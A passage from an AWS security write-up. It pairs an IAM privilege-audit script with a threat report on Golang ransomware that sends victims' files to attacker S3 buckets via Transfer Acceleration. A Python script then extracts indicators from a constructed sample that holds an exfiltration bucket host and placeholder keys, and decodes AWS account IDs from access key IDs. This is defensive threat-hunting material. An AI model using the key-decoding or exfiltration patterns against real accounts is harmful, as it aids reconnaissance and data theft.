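        {"Effect": "Allow", "Action": ["s3:Get*", "s3:List*", "ec2:Describe*"], "Resource": "*"}]}],
}

if __name__ == "__main__":
    for principal, actions in audit(SAMPLE_PRINCIPALS).items():
        print(principal)
        for a in actions:
            print(f"  {a:38} {PRIVILEGED_ACTIONS[a]}")
```

The `role/auditor` case is the one worth staring at: a "read-only" policy written with NotAction still grants `rds:ModifyDBInstance`, snapshot sharing and security-group changes, and only the explicit Deny keeps it off `ec2:RunInstances`. That is the "default deny on privileged actions" point from Moncrief's post in concrete form: the guardrail that actually held was the Deny statement, not the intent behind the Allow. For a real audit, feed this the output of `aws iam get-account-authorization-details` and add Resource and Condition handling (for example an `ec2:InstanceType` condition restricting GPU families) before treating a miss as safe.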

  • Flavio Queiroz, MSc, CISSP, CISM, CRISC, CCISO, Cybersecurity Leader | Information Security | GRC | Security Operations | Mentor | GSOC, GCIH, GDSA, GISP, GPEN, GRTP, GCPN, GDAT, GCISP, GCTIA, CTIA, eCMAP, eCTHP, CTMP

    THREAT ANALYSIS: RANSOMWARE SAMPLES ABUSE AWS S3 TO STEAL DATA
    ℹ️ Researchers have found Golang ransomware samples that abuse the Amazon S3 Transfer Acceleration feature to exfiltrate the victim’s files and upload them to attacker-controlled S3 buckets.
    ℹ️ AWS credentials hard-coded in the samples were used to track the associated AWS account IDs linked to malicious activities, serving as valuable IOCs.
    ℹ️ Attempts were made to disguise the Golang ransomware as the notorious LockBit ransomware. This was done presumably to use the ransomware family’s notoriety to further pressure victims.
    ℹ️ Researchers shared their findings with the AWS Security team. It is important to note that their finding is not a vulnerability in any AWS service. They confirmed with AWS the behavior they identified for this threat actor's activity and it was found to violate the AWS acceptable use policy. The reported AWS access keys and account have been suspended.
    Report: https://lnkd.in/dqyJ8jZ7 #threathunting #threatdetection #threatanalysis #threatintelligence #cyberthreatintelligence #cyberintelligence #cybersecurity #cyberprotection #cyberdefense
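Two of the indicators the post describes, hard-coded access key IDs and the Transfer Acceleration bucket hosts, can be pulled straight out of a sample's strings, and the key ID alone is enough to name the owning account. The following is an added example of that triage; it is not the researchers' tooling. The sample bytes are constructed, the account IDs `111122223333` and `444455556666` are placeholders, and the offline account-ID recovery implements the access key ID encoding that was reverse-engineered and published in 2024, which is not a documented AWS interface; `aws sts get-access-key-info --access-key-id <id>` is the authoritative check.

```python
"""Pull the IOCs the post describes out of a sample: hard-coded access key IDs,
the accounts they belong to, and Transfer Acceleration bucket hosts
(added example; the sample blob is constructed and the account IDs are placeholders)."""
import base64
import re

KEY_ID_RE = re.compile(rb"\b((?:AKIA|ASIA)[A-Z2-7]{16})\b")
ACCEL_RE = re.compile(rb"([a-z0-9.\-]+)\.s3-accelerate(?:\.dualstack)?\.amazonaws\.com")


def account_id_from_key_id(key_id):
    """Offline account-ID recovery from an access key ID. This is the encoding
    reverse-engineered and published in 2024, not a documented AWS interface;
    confirm with `aws sts get-access-key-info --access-key-id <id>` before acting."""
    raw = base64.b32decode(key_id[4:])            # 16 base32 chars -> 10 bytes
    n = int.from_bytes(raw[:6], "big")
    return f"{(n & 0x7FFFFFFFFF80) >> 7:012d}"   # 40-bit account ID sits at bits 7..46


def make_key_id(account_id, prefix="AKIA", tail=b"\x00" * 4):
    """Inverse of the above; only used here to fabricate realistic sample keys."""
    raw = (int(account_id) << 7).to_bytes(6, "big") + tail
    return prefix + base64.b32encode(raw).decode()


def extract_iocs(blob):
    """Return the key IDs, the accounts they decode to and any accelerate bucket names."""
    keys = sorted({m.decode() for m in KEY_ID_RE.findall(blob)})
    return {
        "access_key_ids": keys,
        "accounts": sorted({account_id_from_key_id(k) for k in keys}),
        "accelerate_buckets": sorted({m.decode() for m in ACCEL_RE.findall(blob)}),
    }


KEY_A = make_key_id("111122223333")
KEY_B = make_key_id("444455556666", tail=b"\x2a\x2a\x2a\x2a")
SAMPLE_BLOB = (  # constructed: what `strings` on such a sample might show
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8 + b"Go build ID: \"example\"\x00"
    + b"AWS_ACCESS_KEY_ID=" + KEY_A.encode() + b"\x00"
    + b"AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\x00"
    + b"https://exfil-drop-bucket.s3-accelerate.amazonaws.com/\x00"
    + b"backup key " + KEY_B.encode() + b"\x00"
    + b"ALL YOUR FILES ARE ENCRYPTED BY LOCKBIT\x00"
)

if __name__ == "__main__":
    print(extract_iocs(SAMPLE_BLOB))
```

On the detection side the bucket host is the more durable indicator: a legitimate workload that never enabled Transfer Acceleration has no reason to resolve `*.s3-accelerate.amazonaws.com`, so that hostname in DNS or proxy logs from a file server is a strong exfiltration signal independent of any key rotation on the attacker's side.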
